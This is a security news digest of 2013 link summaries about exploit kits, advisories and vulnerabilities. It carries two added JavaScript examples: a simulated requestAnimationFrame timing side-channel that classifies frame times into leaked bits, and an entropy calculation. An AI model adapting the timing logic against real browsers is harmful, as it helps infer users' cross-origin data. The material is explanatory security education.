http://isc.sans.edu/diary.html?storyid=16427
*** How Exploit Kits Dodge Security Vendors and Researchers ***
---------------------------------------------
Websites with exploit kits are one thing that security vendors and researchers frequently try to look into, so it shouldn't be a surprise that attackers have gone to some length to specifically dodge the good guys. How do they do it? The most basic method used by attackers is an IP blacklist. Just like security...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/qf9ZXjwNgn0/
*** How Can Social Engineering Training Work Effectively? ***
---------------------------------------------
One particular aspect of DEF CON that always gets some media coverage is the Social Engineering Capture the Flag (SECTF) contest, where participants use nothing more than a phone call to get victims at various Fortune 500 companies to give up bits of information. These are the sort of social engineering attacks that give security professionals...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/D-0-ZRv5fSY/
*** Alleged Adobe Reader exploit is probably a fake ***
---------------------------------------------
Evidence is mounting that the critical security hole supposedly present in the current version of Adobe Reader does not exist at all.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Angeblicher-Adobe-Reader-Exploit-ver…
*** Pixel Perfect Timing Attacks with HTML5 ***
---------------------------------------------
"This paper describes a number of timing attack techniques that can be used by a malicious web page to steal sensitive data from a browser, breaking cross-origin restrictions. The new requestAnimationFrame API can be used to time browser rendering operations and infer sensitive data based on timing data."
---------------------------------------------
http://contextis.co.uk/files/Browser_Timing_Attacks.pdf
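The primitive the paper builds on is simple: requestAnimationFrame hands every callback a high-resolution timestamp, so a page can measure how long each frame took to render, and a frame that contains content expensive to draw takes measurably longer. The following is an added example, not code from the Context paper: it isolates that timing-and-decision logic so it runs in Node without a DOM. The scheduler is injected (in a browser it would be window.requestAnimationFrame); makeFakeRaf, the 1.5x threshold, the frame counts and SAMPLE_FRAME_COSTS are all assumptions constructed for the demonstration, and how a page makes rendering cost depend on a cross-origin pixel is the paper's contribution and is not reproduced here.

```javascript
// Added example (not from the paper): frame timing via requestAnimationFrame
// and the threshold decision that turns frame durations into inferred bits.
// `raf` is window.requestAnimationFrame in a browser; it calls back with a
// DOMHighResTimeStamp. Here it is a parameter so the code runs offline.

// Collect `frameCount` consecutive frame durations (ms) and hand them to `done`.
function collectFrameTimes(raf, frameCount, done) {
  const stamps = [];
  function tick(ts) {
    stamps.push(ts);
    if (stamps.length <= frameCount) {
      raf(tick);           // need one more timestamp than durations
      return;
    }
    const deltas = [];
    for (let i = 1; i < stamps.length; i++) deltas.push(stamps[i] - stamps[i - 1]);
    done(deltas);
  }
  raf(tick);
}

// Median rather than mean: a single janky frame must not flip the decision.
function median(values) {
  const s = values.slice().sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// A probe render is "expensive" (bit 1) when its median frame time exceeds the
// calibrated baseline by `factor` (assumed 1.5; an attacker tunes it per target).
function classifyRender(baselineDeltas, probeDeltas, factor = 1.5) {
  return median(probeDeltas) > factor * median(baselineDeltas) ? 1 : 0;
}

// Hypothetical offline scheduler: frames are delivered synchronously and
// `frameCostMs(index)` stands in for the real cost of drawing the frame.
function makeFakeRaf(frameCostMs) {
  let clock = 0;
  let index = 0;
  return function raf(cb) {
    clock += frameCostMs(index++);
    cb(clock);
  };
}

// Calibrate on baseline frames, then recover one bit per probe render.
function recoverBits(frameCosts, framesPerSample = 8) {
  let baseline;
  collectFrameTimes(makeFakeRaf(() => frameCosts.baseline), framesPerSample,
                    d => { baseline = d; });
  return frameCosts.probes.map(cost => {
    let probe;
    collectFrameTimes(makeFakeRaf(() => cost), framesPerSample,
                      d => { probe = d; });
    return classifyRender(baseline, probe);
  });
}

// Constructed sample: an idle 60 Hz page (16.7 ms/frame) and three probes whose
// render cost depends on the secret being probed.
const SAMPLE_FRAME_COSTS = { baseline: 16.7, probes: [45, 17, 40] };

console.log(recoverBits(SAMPLE_FRAME_COSTS)); // [ 1, 0, 1 ]
```

The defensive reading is the same as for every timing side channel: the signal is not the API but the data-dependent rendering cost, so coarsening timer resolution only raises the number of samples an attacker needs.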
*** BSI: no warning against Windows 8 despite "critical aspects" ***
---------------------------------------------
In a statement, the German Federal Office for Information Security clarifies that it has no fundamental security concerns about the use of Windows 8 and Trusted Computing. The BSI does, however, criticize certain aspects of the operating system.
---------------------------------------------
http://www.heise.de/security/meldung/BSI-Trotz-kritischer-Aspekte-keine-War…
*** Setuid problems on Debian derivatives ***
---------------------------------------------
A sloppily programmed setuid tool from the VMware package hands out root privileges; but the causes go deeper.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Setuid-Probleme-auf-Debian-Abkoemmli…
https://secunia.com/advisories/54580
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 21-08-2013 18:00 − Thursday 22-08-2013 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** If you ever use text VTs, don't run XMir right now ***
---------------------------------------------
It'd be easy to assume that in a Mir-based world, the Mir server receives input events and hands them over to Mir clients. In fact, as I described here, XMir uses standard Xorg input drivers and so receives all input events directly. This led to issues like the duplicate mouse pointer seen in earlier versions of XMir - as well as the pointer being drawn by XMir, Mir was drawing its own pointer. But there's also some more subtle issues. Mir recently gained a fairly simple implementation of VT...
---------------------------------------------
http://mjg59.dreamwidth.org/27327.html
*** Jumping Out of IE's Sandbox With One Click ***
---------------------------------------------
Software vendors often give intentionally vague and boring names to the updates they use to fix security vulnerabilities. The lamer the name, the less attention it may attract from attackers looking to reverse-engineer the patch. There was one patch in Microsoft's August Patch Tuesday release earlier this month that fit that bill, MS13-059, Cumulative Security [...]
---------------------------------------------
http://threatpost.com/jumping-out-of-ies-sandbox-with-one-click/102054
*** BSI: no warning against Windows 8 despite "critical aspects" ***
---------------------------------------------
In a statement, the German Federal Office for Information Security clarifies that it has no fundamental security concerns about the use of Windows 8 and Trusted Computing. The BSI does, however, criticize certain aspects of the operating system.
---------------------------------------------
http://www.heise.de/security/meldung/BSI-Trotz-kritischer-Aspekte-keine-War…
*** Siemens COMOS Privilege Escalation Vulnerability ***
---------------------------------------------
OVERVIEW: Siemens has notified ICS-CERT of a privilege escalation vulnerability in the Siemens COMOS database application. Siemens has produced a patch that mitigates this vulnerability. AFFECTED PRODUCTS: The following Siemens COMOS versions are affected:...
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-233-01
*** Cisco Prime Central for Hosted Collaboration Solution Assurance Denial of Service Vulnerabilities ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** MySQL Debian/Ubuntu Installation Script Lets Local Users Obtain Potentially Sensitive Information ***
---------------------------------------------
http://www.securitytracker.com/id/1028927
*** Hotel Software and Booking system 1.8 SQL Injection & Cross Site Scripting ***
---------------------------------------------
Topic: Hotel Software and Booking system 1.8 SQL Injection & Cross Site Scripting Risk: Medium Text: # Exploit Title: Hotel Software and Booking system 1.8 - SQL Injection / Cross Site Scripting # Date: 21 de A...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080175
*** Drupal Zen 7.x Cross Site Scripting ***
---------------------------------------------
Topic: Drupal Zen 7.x Cross Site Scripting Risk: Low Text:View online: https://drupal.org/node/2071157 * Advisory ID: DRUPAL-SA-CONTRIB-2013-070 * Project: Zen [1] (third-party ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013080180
*** Debian update for cacti ***
---------------------------------------------
https://secunia.com/advisories/54181
*** Multiple NetGear ProSafe Switches CVE-2013-4776 Remote Denial of Service Vulnerability ***
---------------------------------------------
A range of ProSafe switches are affected by two different vulnerabilities. CVE-2013-4775: Unauthenticated startup-config disclosure. CVE-2013-4776: Denial of Service vulne...
---------------------------------------------
http://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_aug_2…
*** [webapps] - Netgear ProSafe - Denial of Service Vulnerability ***
---------------------------------------------
http://www.exploit-db.com/exploits/27775
*** [webapps] - Netgear ProSafe - Information Disclosure Vulnerability ***
---------------------------------------------
http://www.exploit-db.com/exploits/27774
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 20-08-2013 18:00 − Wednesday 21-08-2013 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Hacker apparently harvests Twitter login credentials ***
---------------------------------------------
A hacker has apparently obtained login data for the short-message service Twitter. The attacker, who calls himself Mauritania Hacker, on Tuesday published purported details of more than 15,000 Twitter accounts.
---------------------------------------------
http://www.heise.de/security/meldung/Hacker-greift-offenbar-Zugangsdaten-fu…
*** Poison Ivy: Assessing Damage and Extracting Intelligence ***
---------------------------------------------
Today, our research team is publishing a report on the Poison Ivy family of remote access tools (RATs) along with a package of tools created...
---------------------------------------------
http://www.fireeye.com/blog/technical/targeted-attack/2013/08/pivy-assessin…
*** Measuring Entropy and its Applications to Encryption ***
---------------------------------------------
There have been a bunch of articles about an information theory paper with vaguely sensational headlines like "Encryption is less secure than we thought" and "Research shakes crypto foundations." It's actually not that bad. Basically, the researchers argue that the traditional measurement of Shannon entropy isn't the right model to use for cryptography, and that minimum entropy is. This difference may...
---------------------------------------------
http://www.schneier.com/blog/archives/2013/08/measuring_entro.html
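The point is easiest to see on a skewed distribution of secrets. Shannon entropy measures the average surprise over all outcomes; min-entropy measures only the single most likely outcome, and 2 to the power of minus the min-entropy is exactly the probability that an attacker's best first guess is right. The following is an added example (not from the paper or from Schneier's post) that computes both for a uniform key and for a constructed "password" distribution; the group encoding {p, n}, the function names and the two sample distributions are all assumptions of this example.

```javascript
// Added example (not from the paper): Shannon entropy vs. min-entropy, and
// the guessing-attack view that makes the difference matter.
// A distribution is a list of groups {p, n}: n outcomes that each occur with
// probability p. That keeps a 2^20-way uniform tail to a single entry.

function checkDistribution(groups) {
  const total = groups.reduce((acc, g) => acc + g.p * g.n, 0);
  if (Math.abs(total - 1) > 1e-9) {
    throw new Error(`probabilities sum to ${total}, not 1`);
  }
}

// H(X) = -sum_x p(x) log2 p(x): average surprise, in bits.
function shannonEntropy(groups) {
  checkDistribution(groups);
  return groups.reduce(
    (acc, g) => (g.p > 0 ? acc - g.n * g.p * Math.log2(g.p) : acc), 0);
}

// H_inf(X) = -log2 max_x p(x): surprise of the most likely outcome only.
function minEntropy(groups) {
  checkDistribution(groups);
  return -Math.log2(Math.max(...groups.map(g => g.p)));
}

// Probability that an attacker who tries the most likely values first
// succeeds within k guesses: the sum of the k largest probabilities.
function successWithinGuesses(groups, k) {
  checkDistribution(groups);
  const sorted = groups.slice().sort((a, b) => b.p - a.p);
  let remaining = k;
  let prob = 0;
  for (const g of sorted) {
    const take = Math.min(remaining, g.n);
    prob += take * g.p;
    remaining -= take;
    if (remaining === 0) break;
  }
  return prob;
}

function summarize(groups) {
  return {
    shannonBits: shannonEntropy(groups),
    minEntropyBits: minEntropy(groups),
    firstGuessSuccess: successWithinGuesses(groups, 1),
  };
}

// Constructed distributions.
// Uniform 20-bit key: both measures agree at 20 bits.
const UNIFORM_20BIT = [{ p: 2 ** -20, n: 2 ** 20 }];
// Skewed "password" population: half of all users pick one value, the other
// half spread uniformly over 2^20 values. Shannon reports 11 bits; min-entropy
// reports 1 bit, and one guess succeeds half the time.
const SKEWED = [{ p: 0.5, n: 1 }, { p: 0.5 / 2 ** 20, n: 2 ** 20 }];

console.log(summarize(UNIFORM_20BIT)); // 20 bits, 20 bits, 2^-20
console.log(summarize(SKEWED));        // 11 bits, 1 bit, 0.5
```

Min-entropy is never larger than Shannon entropy, and for key material derived from a source the attacker can partly predict it is the number that bounds the attacker's odds; that is why randomness extractors and key-derivation analyses are stated in terms of min-entropy.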
*** Security researcher: zero-day hole in Adobe Reader ***
---------------------------------------------
The current version of Adobe Reader supposedly contains a critical vulnerability that lets attackers place malicious code in PDF documents. The code executes as soon as the document is opened.
---------------------------------------------
http://www.heise.de/security/meldung/Sicherheitsforscher-Zero-Day-Luecke-im…
*** Gpg4win 2.2 encrypts e-mails and files ***
---------------------------------------------
The new version 2.2 of the GnuPG distribution for Windows supports Outlook 2010 and 2013. The encryption plug-in for Windows Explorer is now also shipped in a 64-bit build.
---------------------------------------------
http://www.heise.de/security/meldung/Gpg4win-2-2-verschluesselt-E-Mails-und…
*** Security Bulletin: Potential Security Vulnerabilities fixed in IBM WebSphere Application Server 8.0.0.7 ***
---------------------------------------------
Cross reference list for security vulnerabilities fixed in IBM WebSphere Application Server Fix Pack 8.0.0.7 CVE(s): CVE-2013-2967, CVE-2013-2976, CVE-2013-4004, CVE-2013-0169, CVE-2013-0597, CVE-2013-1768, CVE-2013-1862, CVE-2013-4005, CVE-2013-3029, CVE-2013-1896, and CVE-2012-2098 Affected product(s) and affected version(s): The following IBM WebSphere Application Server Versions are affected: Version 8.5 Version 8 Version 7 Version 6.1 OSGi Applications and JPA Feature Pack EJB 3.0
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_pot…
*** RSA Authentication Agent for PAM Allows Remote Users to Make Unlimited Login Attempts ***
---------------------------------------------
http://www.securitytracker.com/id/1028930
*** IBM WebSphere Portal Unspecified Bug Lets Remote Users Access User Directories ***
---------------------------------------------
http://www.securitytracker.com/id/1028933
*** McAfee Email Gateway Email Processing "ws_inv-smtp" Denial of Service Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54486
*** PHP OpenID XRDS Processing XML External Entities Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/54542
*** Multiple Vulnerabilities in Cisco Unified Communications Manager ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…